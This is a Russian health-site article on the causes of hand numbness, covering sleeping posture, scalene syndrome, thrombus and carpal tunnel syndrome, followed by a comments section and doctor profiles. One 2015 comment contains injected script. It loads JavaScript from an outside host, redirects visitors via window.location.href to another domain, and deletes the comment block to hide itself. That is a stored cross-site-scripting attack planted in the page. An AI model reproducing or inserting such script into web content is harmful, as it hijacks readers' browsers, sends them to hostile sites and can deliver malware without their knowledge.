Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  От чего немеют руки?  >>  От чего немеют руки?
 
Обратная связь
 

От чего немеют руки?

Размер шрифта
11 октября 2011 07:02
  • google_analytics: false
  • Нравится

Потерять возможность двигаться – страшно. Поэтому когда за ночь занемеет рука или нога многие пугаются, нет-нет, а хоть на секунду мелькнет мысль – «а вдруг это насовсем»? Но вот вы размяли руку и снова прекрасно себя чувствуете. Об утреннем страхе можно и забыть… до завтрашнего утра.

1

 

Так почему же все-таки немеют руки? Причин этому может быть несколько:

  1. Руки могут неметь и из-за неправильного положения шеи во сне, например, если подушка расположена слишком низко или же наоборот, слишком высоко. От неправильного положения шеи напрягаются мышцы, они пережимают сосуды и не дают крови в достаточном объеме поступать в тканям. Решить проблему можно только экспериментальным путем, постепенно опуская подушку до тех пор, пока руки не перестанут затекать. Быть может, надо вообще сменить подушку. Тогда вам будет проще найти удобное положение.

  2. С положением головы связана и еще одна причина онемения рук у мужчин, которая называется «синдром первой брачной ночи». Девушки нередко засыпают на плече у своих партнеров, не задумываясь о том, что голова очень тяжелая. Как итог – перекрытие артерии и онемевшая с утра рука у молодого человека.

  3. Спазм мышцы под названием скаленус (лат. «лестница»). Скаленус, по-другому лестничная мышца, располагается между первым ребром и двумя-тремя нижними шейными позвонками. Между лестничной мышцей и ребром есть отверстие, сквозь которое проходят подключичная артерия. По этой артерии кровоток проходит в руку. При шейном остеохондрозе лестничная мышца спазмируется. Этот спазм пережимает артерию. Кровоток нарушается, и рука немеет. Такое явление называется скаленус-синдром, или синдром передней лестничной мышцы.

По-научному онемение рук называется парестезией. Причин парестезии может быть много, и некоторые мы описали выше. Но если с синдромом передней лестничной мышцы можно обратиться к мануальному терапевту, а правильно подобранная подушка решит многие проблемы с ночной потерей чувствительности рук, то иногда онемение может быть тревожным признаком.

  1. В частности, оно может указывать на наличие тромба в артерии. Если онемение не проходит больше часа, то следует немедленно обратиться к врачу, иначе последствием может стать необратимое поражение тканей руки.

  2. А еще онемение может быть говорить о запястном, или туннельном, синдроме. К нашим пальцам через запястье проходит срединный нерв. Канал, по которому он идет, очень узок. Если запястье испытывает большую нагрузку (например, при постоянной работе на ПК), то канал этот сужается и пережимает нерв. Последствия – онемение и боли в запястье (подробно о запястном синдроме и других офисных болезнях в сюжете программы «Жить здорово»). Лечить запястный синдром может только врач.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.